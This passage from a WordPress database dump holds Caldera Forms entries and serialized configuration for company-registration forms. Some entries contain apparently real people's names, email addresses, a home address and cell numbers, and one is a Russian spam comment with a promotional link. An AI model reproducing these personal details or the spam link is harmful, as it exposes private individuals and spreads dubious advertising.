Lenasia'),(116,10,'fld_8674929','province','Gauteng'),(117,10,'fld_9364351','postal_code','1827'),(118,10,'fld_734537','upload_certified_copies_of_director_idspassport','http://companyregistration.online/wp-content/uploads/2016/04/Drivers-license-3.pdf'),(119,10,'fld_6786328','click_to_submit','click'),(120,11,'fld_8768091','first_name','Zainub'),(121,11,'fld_9970286','last_name','Mahomed'),(122,11,'fld_6009157','email_address','zainubmaw@gmail.com'),(123,11,'fld_7683514','comments_questions','Well Done Imraan! Keep up the good work :)'),(124,11,'fld_7908577','send_form','click'),(125,12,'fld_8768091','first_name','Imraan'),(126,12,'fld_9970286','last_name','Deen'),(127,12,'fld_6009157','email_address','imraan@mawinc.co.za'),(128,12,'fld_7683514','comments_questions','Alhamdulilah'),(129,12,'fld_7908577','send_form','click'),(130,13,'fld_5001800','full_name','imraan Deen'),(131,13,'fld_5442186','email_address','imraanmaw@gmail.com'),(132,13,'fld_4734641','company_name','ABC Pty Ltd'),(133,13,'fld_4750442','company_registration_number','1900/000000/00'),(134,13,'fld_7437829','turnover_for_the_respective_year','10'),(135,13,'fld_5578548','submit','click'),(136,14,'fld_8768091','first_name','Charlestaupt'),(137,14,'fld_9970286','last_name','CharlestauptJQ'),(138,14,'fld_6009157','email_address','bullet45@chat.ru'),(139,14,'fld_7683514','comments_questions','В этом и есть Мужская сила \r\n \r\nЭто революция мужской силы. Ты это точно оцениш. Небуду описывать подробно, просто жми и будь мужиком http://portu-nedv.ru/15FWlN'),(140,15,'fld_6562030','proposed_company_name','abc\r\ndfc \r\ngft\r\nfgt'),(141,15,'fld_9988349','how_many_directors_in_the_company','One'),(142,15,'fld_2828361','do_you_have_a_business_address','Yes'),(143,15,'fld_8860272','physical_address_of_the_company','112 Rose Avenue'),(144,15,'fld_7471073','province_of_business_address','Johannesburg'),(145,15,'fld_1282952','suburb_of_business','Lenasia'),(146,15,'fld_9752837','postal_code_of_business_address','1827'),(147,15,'fld_4904638','section_1',''),(148,15,'fld_4045814','incorporator_or_1st_directors_full_name','Imraan Deen'),(149,15,'fld_3880152','physical_home_address1','112 Rose Avenue'),(150,15,'fld_8674929','city1','Johannesburg'),(151,15,'fld_132545','suburb1','Lenasia'),(152,15,'fld_9364351','postal_codeone','1827'),(153,15,'fld_6786328','click_to_submit','click'),(154,15,'fld_734537','upload_certified_copies_of_director_idspassport','http://companyregistration.online/wp-content/uploads/893cb820a15696d850dedb2d554e8615/Divi-Keyboard-Shortcuts-.pdf'),(155,15,'fld_8851747','insert_date','201/06/16'),(156,15,'fld_1029156','cell_number10','+27820000000'),(157,15,'fld_4901447','section_5',''),(158,16,'fld_8851747','insert_date','20170506'),(159,16,'fld_6562030','proposed_company_name','abc'),(160,16,'fld_9988349','how_many_directors_in_the_company','One'),(161,16,'fld_2828361','do_you_have_a_business_address','No'),(162,16,'fld_4904638','section_1',''),(163,16,'fld_4045814','incorporator_or_1st_directors_full_name','Imraan Deen'),(164,16,'fld_1029156','cell_number10','+27820557080'),(165,16,'fld_3880152','physical_home_address1','112 Rose Avenue'),(166,16,'fld_8674929','city1','Johannesburg'),(167,16,'fld_132545','suburb1','Lenasia'),(168,16,'fld_9364351','postal_codeone','1827'),(169,16,'fld_4901447','section_5',''),(170,16,'fld_734537','upload_certified_copies_of_director_idspassport','http://companyregistration.online/wp-content/uploads/893cb820a15696d850dedb2d554e8615/Divi-Keyboard-Shortcuts-.pdf'),(171,16,'fld_6786328','click_to_submit','click'),(172,17,'fld_8768091','first_name','nazeer'),(173,17,'fld_9970286','last_name','abrahams'),(174,17,'fld_6009157','email_address','nazeer@digitalstrategies.biz'),(175,17,'fld_7683514','comments_questions','testing 123'),(176,17,'fld_7908577','send_form','click');
/*!40000 ALTER TABLE `wpxb_cf_form_entry_values` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cf_forms`
--

DROP TABLE IF EXISTS `wpxb_cf_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cf_forms` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` varchar(18) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `config` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cf_forms`
--

LOCK TABLES `wpxb_cf_forms` WRITE;
/*!40000 ALTER TABLE `wpxb_cf_forms` DISABLE KEYS */;
INSERT INTO `wpxb_cf_forms` VALUES (1,'CF56f6fc44b6d4f','primary','a:17:{s:13:\"_last_updated\";s:31:\"Fri, 21 Aug 2015 00:33:50 +0000\";s:2:\"ID\";s:15:\"CF56f6fc44b6d4f\";s:4:\"name\";s:9:\"Test Form\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";s:0:\"\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:8:{s:11:\"fld_4338248\";s:3:\"1:1\";s:11:\"fld_1316929\";s:3:\"1:1\";s:11:\"fld_6796077\";s:3:\"1:1\";s:11:\"fld_5987102\";s:3:\"1:1\";s:11:\"fld_3993413\";s:3:\"2:1\";s:11:\"fld_5161425\";s:3:\"2:2\";s:11:\"fld_8997460\";s:3:\"3:1\";s:11:\"fld_1338703\";s:3:\"3:2\";}s:9:\"structure\";s:10:\"12|6:6|6:6\";}s:6:\"fields\";a:8:{s:11:\"fld_1316929\";a:7:{s:2:\"ID\";s:11:\"fld_1316929\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:7:\"Two Big\";s:4:\"slug\";s:7:\"two_big\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:5;}s:10:\"conditions\";a:2:{s:4:\"type\";s:4:\"hide\";s:5:\"group\";a:1:{s:13:\"rw19946608611\";a:1:{s:12:\"cl3564295763\";a:3:{s:5:\"field\";s:11:\"fld_5161425\";s:7:\"compare\";s:5:\"isnot\";s:5:\"value\";s:10:\"opt1533135\";}}}}}s:11:\"fld_4338248\";a:7:{s:2:\"ID\";s:11:\"fld_4338248\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:3:\"One\";s:4:\"slug\";s:3:\"one\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:10;}s:10:\"conditions\";a:2:{s:4:\"type\";s:4:\"hide\";s:5:\"group\";a:1:{s:13:\"rw47185924125\";a:1:{s:12:\"cl5675243200\";a:3:{s:5:\"field\";s:11:\"fld_3993413\";s:7:\"compare\";s:5:\"isnot\";s:5:\"value\";s:10:\"opt1697235\";}}}}}s:11:\"fld_5987102\";a:7:{s:2:\"ID\";s:11:\"fld_5987102\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:4:\"Base\";s:4:\"slug\";s:4:\"base\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:25;}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_3993413\";a:7:{s:2:\"ID\";s:11:\"fld_3993413\";s:4:\"type\";s:8:\"checkbox\";s:5:\"label\";s:14:\"Want Option 1?\";s:4:\"slug\";s:8:\"option_1\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:6:\"inline\";i:1;s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:7:\"default\";s:0:\"\";s:6:\"option\";a:1:{s:10:\"opt1697235\";a:2:{s:5:\"value\";s:0:\"\";s:5:\"label\";s:3:\"Yes\";}}}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_5161425\";a:7:{s:2:\"ID\";s:11:\"fld_5161425\";s:4:\"type\";s:8:\"dropdown\";s:5:\"label\";s:13:\"Option 2 Type\";s:4:\"slug\";s:8:\"option_2\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:7:\"default\";s:0:\"\";s:6:\"option\";a:2:{s:10:\"opt1533135\";a:2:{s:5:\"value\";s:0:\"\";s:5:\"label\";s:3:\"Big\";}s:10:\"opt1786217\";a:2:{s:5:\"value\";s:0:\"\";s:5:\"label\";s:5:\"Small\";}}}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_8997460\";a:7:{s:2:\"ID\";s:11:\"fld_8997460\";s:4:\"type\";s:11:\"calculation\";s:5:\"label\";s:5:\"Total\";s:4:\"slug\";s:5:\"total\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:10:{s:12:\"custom_class\";s:0:\"\";s:7:\"element\";s:2:\"h3\";s:7:\"classes\";s:10:\"total-line\";s:6:\"before\";s:6:\"Total:\";s:5:\"after\";s:0:\"\";s:5:\"fixed\";i:1;s:18:\"thousand_separator\";s:1:\",\";s:8:\"formular\";s:53:\" ( fld_5987102+fld_4338248+fld_6796077+fld_1316929 ) \";s:6:\"config\";a:1:{s:5:\"group\";a:1:{i:0;a:1:{s:5:\"lines\";a:4:{i:0;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_5987102\";}i:1;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_4338248\";}i:2;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_6796077\";}i:3;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_1316929\";}}}}}s:14:\"manual_formula\";s:0:\"\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_1338703\";a:7:{s:2:\"ID\";s:11:\"fld_1338703\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:3:\"Pay\";s:4:\"slug\";s:3:\"pay\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_6796077\";a:7:{s:2:\"ID\";s:11:\"fld_6796077\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:9:\"Two Small\";s:4:\"slug\";s:9:\"two_small\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:1;}s:10:\"conditions\";a:2:{s:4:\"type\";s:4:\"hide\";s:5:\"group\";a:1:{s:13:\"rw74415141932\";a:1:{s:12:\"cl7168988428\";a:3:{s:5:\"field\";s:11:\"fld_5161425\";s:7:\"compare\";s:5:\"isnot\";s:5:\"value\";s:10:\"opt1786217\";}}}}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:6:\"mailer\";a:1:{s:9:\"on_insert\";i:1;}}'),(2,'CF56f703597f336','primary','a:20:{s:13:\"_last_updated\";s:31:\"Sat, 26 Mar 2016 23:28:46 +0000\";s:2:\"ID\";s:15:\"CF56f703597f336\";s:10:\"cf_version\";s:7:\"1.3.3.1\";s:4:\"name\";s:21:\"Test form no template\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";N;s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:30:{s:11:\"fld_8206916\";s:3:\"1:1\";s:11:\"fld_1571458\";s:3:\"1:1\";s:11:\"fld_6562030\";s:3:\"1:1\";s:11:\"fld_2828361\";s:3:\"1:1\";s:11:\"fld_8860272\";s:3:\"1:1\";s:11:\"fld_1282952\";s:3:\"1:1\";s:11:\"fld_7471073\";s:3:\"1:1\";s:11:\"fld_9752837\";s:3:\"1:1\";s:11:\"fld_4045814\";s:3:\"2:1\";s:11:\"fld_3416133\";s:3:\"2:1\";s:11:\"fld_3880152\";s:3:\"2:1\";s:10:\"fld_132545\";s:3:\"2:1\";s:11:\"fld_8674929\";s:3:\"2:1\";s:11:\"fld_9364351\";s:3:\"2:1\";s:10:\"fld_522190\";s:3:\"3:1\";s:11:\"fld_9551334\";s:3:\"4:1\";s:11:\"fld_1545256\";s:3:\"4:1\";s:11:\"fld_8308585\";s:3:\"4:1\";s:11:\"fld_5540196\";s:3:\"4:1\";s:11:\"fld_4892098\";s:3:\"4:1\";s:11:\"fld_1866212\";s:3:\"5:1\";s:11:\"fld_6812809\";s:3:\"5:1\";s:11:\"fld_5671086\";s:3:\"5:1\";s:11:\"fld_7897870\";s:3:\"5:1\";s:10:\"fld_804187\";s:3:\"5:1\";s:11:\"fld_4785974\";s:3:\"6:1\";s:11:\"fld_2503013\";s:3:\"6:1\";s:11:\"fld_6024828\";s:3:\"6:1\";s:11:\"fld_8466692\";s:3:\"6:1\";s:11:\"fld_9847573\";s:3:\"6:1\";}s:9:\"structure\";s:17:\"12|12|12|12|12#12\";}s:6:\"fields\";a:30:{s:11:\"fld_8206916\";a:8:{s:2:\"ID\";s:11:\"fld_8206916\";s:4:\"type\";s:11:\"date_picker\";s:5:\"label\";s:18:\"Insert todays date\";s:4:\"slug\";s:18:\"insert_todays_date\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"format\";s:10:\"yyyy-mm-dd\";s:9:\"autoclose\";i:1;s:10:\"start_view\";s:5:\"month\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"language\";s:5:\"en-GB\";}}s:11:\"fld_1571458\";a:8:{s:2:\"ID\";s:11:\"fld_1571458\";s:4:\"type\";s:13:\"toggle_switch\";s:5:\"label\";s:19:\"Number of directors\";s:4:\"slug\";s:19:\"number_of_directors\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:13:{s:12:\"custom_class\";s:0:\"\";s:11:\"orientation\";s:10:\"horizontal\";s:14:\"selected_class\";s:11:\"btn-success\";s:13:\"default_class\";s:11:\"btn-default\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:11:\"orderby_tax\";s:4:\"name\";s:12:\"orderby_post\";s:4:\"name\";s:5:\"order\";s:3:\"ASC\";s:7:\"default\";s:10:\"opt1352113\";s:6:\"option\";a:5:{s:10:\"opt1352113\";a:2:{s:5:\"value\";s:3:\"One\";s:5:\"label\";s:3:\"One\";}s:10:\"opt1587014\";a:2:{s:5:\"value\";s:3:\"Two\";s:5:\"label\";s:3:\"Two\";}s:10:\"opt1232673\";a:2:{s:5:\"value\";s:5:\"Three\";s:5:\"label\";s:5:\"Three\";}s:10:\"opt1311544\";a:2:{s:5:\"value\";s:4:\"Four\";s:5:\"label\";s:4:\"Four\";}s:10:\"opt1371778\";a:2:{s:5:\"value\";s:11:\"More than 4\";s:5:\"label\";s:11:\"More than 4\";}}}}s:11:\"fld_6562030\";a:8:{s:2:\"ID\";s:11:\"fld_6562030\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:21:\"Proposed Company Name\";s:4:\"slug\";s:21:\"proposed_company_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:61:\"Provide 3-4 names of different variations, each on a new line\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:4;s:7:\"default\";s:0:\"\";}}s:11:\"fld_2828361\";a:7:{s:2:\"ID\";s:11:\"fld_2828361\";s:4:\"type\";s:13:\"toggle_switch\";s:5:\"label\";s:31:\"Do you have a business address?\";s:4:\"slug\";s:30:\"do_you_have_a_business_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:134:\"If not, the home address of the 1st Director will used as the business address. This can be changed once your business has an address.\";s:6:\"config\";a:13:{s:12:\"custom_class\";s:0:\"\";s:11:\"orientation\";s:10:\"horizontal\";s:14:\"selected_class\";s:11:\"btn-success\";s:13:\"default_class\";s:11:\"btn-default\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:11:\"orderby_tax\";s:4:\"name\";s:12:\"orderby_post\";s:4:\"name\";s:5:\"order\";s:3:\"ASC\";s:7:\"default\";s:10:\"opt1826204\";s:6:\"option\";a:2:{s:10:\"opt1826204\";a:2:{s:5:\"value\";s:3:\"Yes\";s:5:\"label\";s:3:\"Yes\";}s:10:\"opt1447651\";a:2:{s:5:\"value\";s:2:\"No\";s:5:\"label\";s:2:\"No\";}}}}s:11:\"fld_8860272\";a:8:{s:2:\"ID\";s:11:\"fld_8860272\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:31:\"Physical Address of the Company\";s:4:\"slug\";s:31:\"physical_address_of_the_company\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_5560882522748389\";}s:8:\"required\";i:1;s:7:\"caption\";s:75:\"If premises are currently not available the 1st Director\'s home can be used\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street Address\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_1282952\";a:7:{s:2:\"ID\";s:11:\"fld_1282952\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:18:\"Suburb of business\";s:4:\"slug\";s:18:\"suburb_of_business\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_5560882522748389\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_7471073\";a:7:{s:2:\"ID\";s:11:\"fld_7471073\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:28:\"Province of business address\";s:4:\"slug\";s:28:\"province_of_business_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_5560882522748389\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:8:\"Province\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9752837\";a:7:{s:2:\"ID\";s:11:\"fld_9752837\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:31:\"Postal Code of business address\";s:4:\"slug\";s:31:\"postal_code_of_business_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_5560882522748389\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_4045814\";a:8:{s:2:\"ID\";s:11:\"fld_4045814\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:40:\"Incorporator or 1st Director\'s Full Name\";s:4:\"slug\";s:39:\"incorporator_or_1st_directors_full_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:67:\"The incorporator and the 1st Director are generally the same person\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:22:\"NB: Full name required\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_3416133\";a:8:{s:2:\"ID\";s:11:\"fld_3416133\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:37:\"Cell Phone Number of the 1st Director\";s:4:\"slug\";s:37:\"cell_phone_number_of_the_1st_director\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:12:\"099 999 9999\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";}}s:11:\"fld_3880152\";a:8:{s:2:\"ID\";s:11:\"fld_3880152\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:37:\"Physical Home Address of 1st Director\";s:4:\"slug\";s:37:\"physical_home_address_of_1st_director\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street address\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:10:\"fld_132545\";a:8:{s:2:\"ID\";s:10:\"fld_132545\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:6:\"Suburb\";s:4:\"slug\";s:6:\"suburb\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_8674929\";a:8:{s:2:\"ID\";s:11:\"fld_8674929\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:8:\"Province\";s:4:\"slug\";s:8:\"province\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:8:\"Province\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9364351\";a:8:{s:2:\"ID\";s:11:\"fld_9364351\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:11:\"Postal Code\";s:4:\"slug\";s:11:\"postal_code\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_4785974\";a:8:{s:2:\"ID\";s:11:\"fld_4785974\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:24:\"2nd director\'s Full Name\";s:4:\"slug\";s:18:\"2nd_directors_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:22:\"NB: Full Name required\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_2503013\";a:8:{s:2:\"ID\";s:11:\"fld_2503013\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:34:\"Physical Home Address 2nd Director\";s:4:\"slug\";s:34:\"physical_home_address_2nd_director\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street Address\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_6024828\";a:8:{s:2:\"ID\";s:11:\"fld_6024828\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"Suburb 2nd\";s:4:\"slug\";s:11:\"suburb__2nd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_8466692\";a:8:{s:2:\"ID\";s:11:\"fld_8466692\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:12:\"Province 2nd\";s:4:\"slug\";s:12:\"province_2nd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:8:\"Province\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9847573\";a:8:{s:2:\"ID\";s:11:\"fld_9847573\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:15:\"Postal Code 2nd\";s:4:\"slug\";s:15:\"postal_code_2nd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9551334\";a:8:{s:2:\"ID\";s:11:\"fld_9551334\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:24:\"3rd Director\'s Full Name\";s:4:\"slug\";s:18:\"3rd_directors_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:22:\"NB: Full Name required\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_1545256\";a:8:{s:2:\"ID\";s:11:\"fld_1545256\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:32:\"Physical Address of 3rd Director\";s:4:\"slug\";s:32:\"physical_address_of_3rd_director\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street Address\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_8308585\";a:8:{s:2:\"ID\";s:11:\"fld_8308585\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"Suburb 3rd\";s:4:\"slug\";s:10:\"suburb_3rd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_5540196\";a:7:{s:2:\"ID\";s:11:\"fld_5540196\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:12:\"Province 3rd\";s:4:\"slug\";s:12:\"province_3rd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:8:\"Province\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_4892098\";a:8:{s:2:\"ID\";s:11:\"fld_4892098\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:15:\"Postal Code 